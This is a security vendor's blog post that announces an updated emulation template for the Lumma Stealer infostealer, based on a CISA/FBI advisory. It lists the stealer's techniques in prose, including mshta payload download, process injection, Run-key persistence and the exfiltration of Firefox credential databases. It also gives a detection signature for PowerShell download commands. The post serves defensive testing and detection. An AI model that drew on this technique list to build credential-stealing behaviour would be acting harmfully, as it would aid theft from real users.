On May 21, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) to disseminate Tactics, Techniques and Procedures (TTPs) and Indicators of Compromise (IOCs), associated with threat actors deploying the LummaC2 information stealer malware, identified through FBI investigations as recent as May 2025.

Lumma Stealer, also known as LummaC2, is a lightweight subscription-based information stealer offered under the Malware-as-a-Service (MaaS) business model that has been active since at least 2022.

It has been advertised on Russian-speaking dark web forums since its origins but has also been seen being promoted on a Telegram channel since May 2023. As advertised, Lumma is approximately 150-200 KB and can affect operating systems ranging from Windows 7 to Windows 11.

At the beginning of its operation, Lumma will seek to perform system profiling by gathering information such as operating system version, architecture, language, and hardware details, such as CPU and memory, in order to rule out unwanted targets.

Following target selection, it collects sensitive information, primarily looking for browser information (Chromium and Mozilla-based) such as browsing history, cookies, extensions, usernames/passwords, personal identification details, and credit card numbers. It will then seek to identify cryptocurrency wallets and information related to two-factor authentication (2FA) before finally exfiltrating the collected information to the Command and Control (C2) server.

AttackIQ has previously released an assessment template emulating the behaviors exhibited by Lumma Stealer. AttackIQ has now updated this assessment template to incorporate the latest Tactics, Techniques and Procedures (TTPs) and malware samples revealed in the CISA’s Cybersecurity Advisory (CSA) to help customers test their security controls and their ability to defend against sophisticated threats.

Validating your security program performance against these behaviors is vital in reducing risk. By using this updated assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against a highly opportunistic, financially motivated threat.
  • Assess your security posture against a threat interested in harvesting sensitive information in an automated and swift manner.
  • Continuously validate detection and prevention pipelines against a threat interested in acquiring credentials that could be used for a subsequent attack.

Lumma Stealer – 2024-09 – Post-Compromise Tactics, Techniques and Procedures (TTPs)

This assessment template compiles all those post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Lumma Stealer during its most recent activities.

It is based on reports published by Cyble in January 2023, SOCRadar in February 2023, DarkTrace in September 2023, CyFirma in June 2024, Ontinue in August 2024, eSentire in September 2024 and CISA in May 2025.

1. Added! Lumma-related Components – Associated Payloads:

Consists of malicious components observed alongside or in support of Lumma Stealer activities, such as initial access payloads and droppers.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

2. Added! Lumma Stealer – Payload Samples and Variants:

Includes the core payloads of Lumma Stealer across different versions, configurations or obfuscation methods.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

3. Execution:

Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.

Process Injection (T1055): This scenario performs process injection by allocating memory in a running process with VirtualAlloc, writing shellcode to that memory space, and then changing the memory protection option with VirtualProtect.

System Binary Proxy Execution: Mshta (T1218.010): This scenario employs the Mshta Windows utility to download a remote Microsoft HTML Application (HTA) payload that includes VBScript code.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.

Added! System Binary Proxy Execution: Rundll32 (T1218.011): This scenario executes an export function from an AttackIQ DLL using the RunDll32 Windows utility.

Hijack Execution Flow: DLL Side-Loading (T1574.002): This scenario leverages a legitimate and trusted executable to side-load a malicious DLL.

4. Persistence

Techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Logon Autostart Execution: Registry Run Keys (T1547.001): This scenario sets the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key that Windows uses to identify what applications should be run at system startup.

5. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Virtualization/Sandbox Evasion (T1497): This scenario will call the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.

6. Discovery

Consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act.

Query Registry (T1012): This scenario queries the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings registry key which contains user-specific properties, such as proxy configurations, security zones, and privacy settings.

Added! Browser Bookmark Discovery (T1217): This scenario leverages a PowerShell script to enumerate browser bookmarks, using the Get-Content cmdlet to extract information about the hosts and its users.

7. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption.

Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of Firefox sensitive information through HTTP POST requests. It exfiltrates the cert9.db and key4.db from a Firefox session filled with staged credentials.

Added! Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of sensitive data by transmitting a text file containing 1000 credit card numbers through HTTP POST requests.

Added! Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of sensitive data by transmitting a text file with password patterns through HTTP POST requests.

Opportunities to Expand Emulation Capabilities

In addition to the updated assessment template, AttackIQ recommends the following scenario to extend the emulation of the capabilities exhibited by Lumma Stealer:

Browser Bookmark Discovery Script: This scenario leverages a PowerShell script to enumerate browser bookmarks, using the Get-Content cmdlet to extract information about the hosts and its users.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against this opportunistic threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a well-known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.